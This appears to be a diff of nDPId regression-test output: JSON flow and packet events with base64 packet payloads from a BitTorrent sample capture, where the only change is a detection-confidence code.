-00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1455469969680,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":1455469969680,"pkt":"xCwDBkn+LFbcjDU0CABFAACJEvpAAHcG+5FPNeQCwKgBAzkjzqAj4\/VaspooC4AYAQLEvgAAAQEICgAAfaoZ2\/ifE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wovPx6i8m4ev0sHgAAADnFABkMTplaTBlNDppcA=="} 01342{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1455469969689,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":620,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":620,"pkt_l4_len":586,"thread_ts_msec":1455469969689,"pkt":"xCwDBkn+LFbcjDU0CABFAAJeEvxAAHcG+bpPNeQCwKgBAzkjzqAj4\/WvspooC4AZAQKoaAAAAQEICgAAfaoZ2\/ifdjQ0Ok815AIxMjpjb21wbGV0ZV9hZ29pNmUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTE0NjI3ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg5NmU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/9\/7\/\/\/\/\/fv\/\/\/\/\/\/f\/\/\/3\/\/\/\/\/9\/7\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/v\/+\/\/\/\/9\/\/\/\/\/\/\/\/+\/\/\/9\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8\/\/\/\/\/\/f\/\/\/\/\/\/7\/\/\/\/\/\/f\/\/3\/P\/\/\/\/\/4AAAAAFBAAAA2sAAAAFBAAAAW0AAAAFBAAAAlYAAAAFBAAAAdEAAAAFBAAAAPQAAAAFBAAAAtIAAAAFBAAAAMsAAAAFBAAAAyUAAAAFBAAAAKMAAAAFBAAAAMQAAAAFBAAAAcEAAAAFBAAAAtMAAAAFBAAAAiUAAAAFBAAAAEYAAAAFBAAAAT8AAAAFBAAAAe4AAAAFBAAAAjwAAAAFBAAAAvgAAAAFBAAAA2oAAAAFBAAAA2AAAAAFBAAAAJgAAAAFBAAAATQAAAAFBAAAAQ4AAAAFBAAAA0w="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970233,"flow_last_seen":1455469970233,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970233,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1455469970233,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469970233,"pkt":"LFbcjDU0xCwDBkn+CABFAAB45PBAAEAGAADAqAEDlxpfHs6hWJHZNtVIfkyTS4AYJnO4TgAAAQEIChnb+7IRKfdEE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjjCQUdTBqR8vIZE="} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970233,"flow_last_seen":1455469970233,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970233,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970233,"flow_last_seen":1455469970233,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970233,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1455469970293,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1455469970293,"pkt":"xCwDBkn+LFbcjDU0CABFAACkCYZAAHIGRuqXGl8ewKgBA1iRzqF+TJNL2TbVjIAYHVxFKAAAAQEIChEp94AZ2\/uyE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC2coXQqpAS87AVXIDwAAADnFABkMTplaTBlNDppcHY0NDqXGl8eMTI6Y29tcGxldGVfYWdvaTFlMQ=="} 01305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1455469970357,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":593,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":593,"pkt_l4_len":559,"thread_ts_msec":1455469970357,"pkt":"xCwDBkn+LFbcjDU0CABFAAJDCYlAAHIGRUiXGl8ewKgBA1iRzqF+TJO72TbVjIAYHVwHogAAAQEIChEp97wZ2\/vsOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTIyNjczZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg5N2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/2\/3\/\/\/\/r\/\/\/\/\/9\/3\/\/\/\/\/9\/+\/\/+\/\/+\/\/\/\/f\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/f\/9\/\/\/\/\/\/\/\/+\/\/\/+\/v\/\/\/7\/\/7\/\/9\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAUAAAAAFBAAAAboAAAAFBAAAArkAAAAFBAAAA0EAAAAFBAAAAD0AAAAFBAAAAvsAAAAFBAAAAPwAAAAFBAAAAPMAAAAFBAAAAqcAAAAFBAAAAX0AAAAFBAAAAY8AAAAFBAAAAaEAAAAFBAAAAo0AAAAFBAAAAPAAAAAFBAAAAegAAAAFBAAAAjYAAAAFBAAAARsAAAAFBAAAAm0AAAAFBAAAAoUAAAAFBAAAAUoAAAAFBAAAARkAAAAFBAAAAswAAAAFBAAAAiYAAAAFBAAAAXA="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970452,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1455469970452,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469970452,"pkt":"LFbcjDU0xCwDBkn+CABFAAB41kZAAEAGAADAqAEDTzeBFs6dL0HtOa3YPhLeWYAYVhCSYwAAAQEIChnb\/IcCXeBSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjpi3Emqkm5uHs80="} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970452,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970452,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971321,"flow_last_seen":1455469971321,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971321,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1455469971321,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469971321,"pkt":"LFbcjDU0xCwDBkn+CABFAAB48HJAAEAGAADAqAEDxmSSCc6n6wMx0mzN3F5zZYAYZooahAAAAQEIChnb\/+QB8nE1E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjuG56+SlFtqa9S4="} -00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971321,"flow_last_seen":1455469971321,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971321,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971321,"flow_last_seen":1455469971321,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971321,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1455469971481,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1455469971481,"pkt":"xCwDBkn+LFbcjDU0CABFAACcFzZAAHYG0wzGZJIJwKgBA+sDzqfcXnNlMdJtEYAYAQK5ewAAAQEICgHycUYZ2\/\/kE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wopccBVvnEHfGIYQAAADnFABkMTplaTBlNDppcHY0NDrGZJIJMTI6Y29tcGxldGU="} 01316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1455469971641,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":601,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":601,"pkt_l4_len":567,"thread_ts_msec":1455469971641,"pkt":"xCwDBkn+LFbcjDU0CABFAAJLGqBAAHYGzfPGZJIJwKgBA+sDzqfcXnPNMdJtEYAYAQJeTwAAAQEICgHycVYZ3ACEX2Fnb2kyZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNjAxNjNlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTAzZTY6eW91cmlwNDpSN80BZQAAAHQF\/\/\/\/\/\/\/f9\/\/\/\/37\/\/7\/\/\/\/\/\/\/3r\/\/\/\/3+\/\/7\/\/\/\/3\/\/9\/\/\/\/\/\/\/\/\/\/\/37\/7\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/f\/\/\/\/\/v\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/9\/\/\/gAAAAAUEAAAClAAAAAUEAAAAnQAAAAUEAAAAVwAAAAUEAAACuQAAAAUEAAAAUAAAAAUEAAAA8gAAAAUEAAAB4QAAAAUEAAADfAAAAAUEAAABUwAAAAUEAAAAKgAAAAUEAAAANAAAAAUEAAABXwAAAAUEAAAAaQAAAAUEAAAAmAAAAAUEAAACfAAAAAUEAAADWQAAAAUEAAABTAAAAAUEAAABBgAAAAUEAAABegAAAAUEAAAA1QAAAAUEAAAAxQAAAAUEAAAAvAAAAAUEAAAAnwAAAAUEAAAC6Q=="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971675,"flow_last_seen":1455469971675,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971675,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1455469971675,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469971675,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4IXFAAEAGAADAqAEDvmfDOM6mtimT1S+nN0acgIAY\/\/9DtgAAAQEIChncAUQAv2TsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkGjzZtimXS5YKE="} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971675,"flow_last_seen":1455469971675,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971675,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971675,"flow_last_seen":1455469971675,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971675,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1455469972136,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469972136,"pkt":"xCwDBkn+LFbcjDU0CABFAACrWLRAAHIGbE2+Z8M4wKgBA7YpzqY3RpyAk9Uv64AYAQLhNwAAAQEICgC\/ZvwZ3AFEE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLUJUNzk1MC3xopUl3euuGS1IpvoAAAEBFABkMTplaTBlNDppcHY0NDq+Z8M4NDppcHY2MTY6IAEAAF71efs4aCApQZg8xzE="} 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1455469973108,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1455469973108,"pkt":"LFbcjDU0xCwDBkn+CABFAADJDUpAAEAGAADAqAEDvmfDOM6mtimT1TBDN0ac94AZ\/\/9EBwAAAQEIChncBtUAv2b8M2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTI6dXRfcmVjb21tZW5kaTVlMTA6dXRfY29tbWVudGk2ZWUxOnBpNDA5NTllNDpyZXFxaTI1NWUxOnYxOTrCtVRvcnJlbnQgTWFjIDEuOC42Njp5b3VyaXA0Or5nwzhlAAAAAQ8="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974358,"flow_last_seen":1455469974358,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974358,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1455469974358,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469974358,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4DCdAAEAGAADAqAEDUjrYc86rlaExvR02+FTOIoAY\/\/\/swwAAAQEIChncC64AhEXwE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjk6UZQGZj8psqfs="} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974358,"flow_last_seen":1455469974358,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974358,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974358,"flow_last_seen":1455469974358,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974358,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974533,"flow_last_seen":1455469974533,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974533,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 